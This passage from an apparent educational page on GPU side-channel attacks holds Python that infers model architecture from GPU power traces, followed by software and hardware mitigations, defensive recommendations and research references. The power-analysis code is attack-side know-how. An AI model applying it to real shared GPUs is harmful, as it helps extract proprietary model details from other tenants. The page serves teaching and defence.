                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i
 
        active_phases = [p for p in phases if p["type"] == "active"]
 
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }
 
    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
 
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
 
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
 
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }

Mitigations

Software Mitigations

import torch
from typing import Optional
 
class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""
 
    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
        return tensor
 
    @staticmethod
    def secure_deallocate(tensor: torch.Tensor) -> None:
        """Securely deallocate a tensor by overwriting with zeros before freeing."""
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()
 
    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        import random
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)
 
    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Prevents timing side channels by making all inferences take the same time.
        """
        start = time.perf_counter()
 
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
 
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
 
        return output

Hardware Mitigations

Mitigation	Effectiveness	Performance Impact	Availability
MIG (Multi-Instance GPU)	High — hardware isolation	Reduces per-instance compute	A100, H100
NVIDIA Confidential Computing	Very High — encrypted GPU memory	5-15% overhead	H100
GPU Memory Scrubbing	Medium — removes residuals	Adds allocation latency	Software-configurable
Separate GPU per workload	Complete — no sharing	Expensive	Any GPU
IOMMU	Medium — prevents DMA attacks	Minimal	CPU/chipset dependent

Defensive Recommendations

Use MIG for multi-tenant GPU environments to achieve hardware-enforced memory isolation
Zero-initialize GPU memory on allocation to prevent residual data leakage
Zero-fill GPU memory before freeing sensitive tensors
Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
Avoid GPU time-slicing for security-sensitive workloads — use dedicated GPUs or MIG instances
Add timing noise to inference operations to defeat timing side channels
Monitor GPU power consumption for anomalous patterns that may indicate side-channel attacks
Enable IOMMU to prevent DMA-based memory access from compromised GPU workloads

References

Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)

Edit this page on GitHub

GPU Memory Side-Channel Attacks

Related articles

GPU Memory Side-Channel Attacks

Related articles